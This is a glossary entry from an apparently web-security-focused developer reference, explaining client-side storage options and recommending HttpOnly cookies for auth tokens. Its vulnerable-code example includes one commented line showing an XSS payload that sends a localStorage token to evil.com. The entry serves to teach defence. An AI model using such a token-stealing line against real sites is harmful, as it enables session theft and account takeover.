← Back to glossary

Web Storage, IndexedDB & Cookies

javascript HTML5 Intermediate

Also Known As

localStorage sessionStorage IndexedDB cookies

TL;DR

Three client-side storage mechanisms: localStorage (persistent key-value), sessionStorage (tab-scoped), and IndexedDB (structured, queryable) — each suited to different data sizes and use cases.

Explanation

localStorage: synchronous, 5-10MB, persists across sessions, same origin. sessionStorage: same API, cleared when tab closes. IndexedDB: async, structured data, hundreds of MB, queryable with indexes — use for offline apps and large datasets. Cookies: sent with every HTTP request (session management, server-readable), max 4KB, path/domain scoping, HttpOnly/SameSite flags. Web Storage and IndexedDB are never sent to the server. Cookies with HttpOnly prevent JavaScript access (XSS mitigation). Never store sensitive data (tokens, PII) in localStorage — vulnerable to XSS.

Common Misconception

✗ localStorage is fine for storing auth tokens — localStorage is accessible to any JavaScript on the page; XSS can exfiltrate tokens. Use HttpOnly cookies for auth tokens.

Why It Matters

Storing JWT tokens in localStorage is a common XSS vulnerability — a single injected script exfiltrates all tokens. HttpOnly cookies cannot be read by JavaScript, eliminating this attack vector.

Common Mistakes

Storing auth tokens in localStorage — XSS vulnerable; use HttpOnly cookies.
Synchronous localStorage in performance-critical loops — localStorage reads/writes are synchronous and block the main thread.
Not handling QuotaExceededError — localStorage throws when full; catch the error.
Sensitive data in sessionStorage — also readable by JavaScript; same XSS risk as localStorage.

Code Examples

✗ Vulnerable

// Auth token in localStorage — XSS can steal it:
localStorage.setItem('auth_token', response.token);

// Every fetch:
fetch('/api/data', {
    headers: { Authorization: 'Bearer ' + localStorage.getItem('auth_token') }
});
// Attacker XSS: fetch('https://evil.com/?t=' + localStorage.getItem('auth_token'))

✓ Fixed

// Auth token in HttpOnly cookie — JS cannot read it:
// Server sets on login:
Set-Cookie: auth_token=...; HttpOnly; Secure; SameSite=Strict; Path=/

// Browser sends automatically, JS cannot access:
fetch('/api/data', { credentials: 'include' }); // Cookie sent automatically
// Attacker XSS cannot read the cookie — HttpOnly blocks it

// localStorage for non-sensitive UI state only:
localStorage.setItem('theme', 'dark'); // Fine — not sensitive

References

↗ https://developer.mozilla.org/en-US/docs/Web/API/Web_Storage_API

Tags

Added 15 Mar 2026

Edited 22 Mar 2026

Curated in Warsaw under one editorial standard. 1,444 terms, single voice. About this reference →

Rate this term

No ratings yet

🤖 AI Guestbook educational data only

| |

Last 30 days

Agents 0

No pings yet today

Amazonbot 8 Google 5 Perplexity 3 Unknown AI 3 ChatGPT 2 Ahrefs 2 Majestic 1

Also referenced

SameSite Cookie Attribute 74 Cross-Site Scripting (XSS) 29 Cross-Site Request Forgery (CSRF) 29 Insecure Cookie 21 Browser Storage APIs 19

How they use it

crawler 22 crawler_json 1 pre-tracking 1

Related categories

security 4k javascript 2.2k frontend 851

⚡ DEV INTEL Tools & Severity

🟠 High ⚙ Fix effort: Low

⚡ Quick Fix

Use sessionStorage for temporary per-tab data, localStorage for persistent preferences, IndexedDB for large structured data — never store tokens or sensitive data in any of these

📦 Applies To

javascript HTML5 web

🔗 Prerequisites

Insecure Cookie PHP Session async/await

🔍 Detection Hints

JWT token or auth cookie stored in localStorage — XSS exposes it; sensitive PII stored client-side unencrypted

Auto-detectable: ✓ Yes semgrep eslint

⚠ Related Problems

Cross-Site Scripting (XSS) credential theft Account Takeover (ATO)

🤖 AI Agent

Confidence: Medium False Positives: Medium ✗ Manual fix Fix: Medium Context: File

CWE-312 CWE-922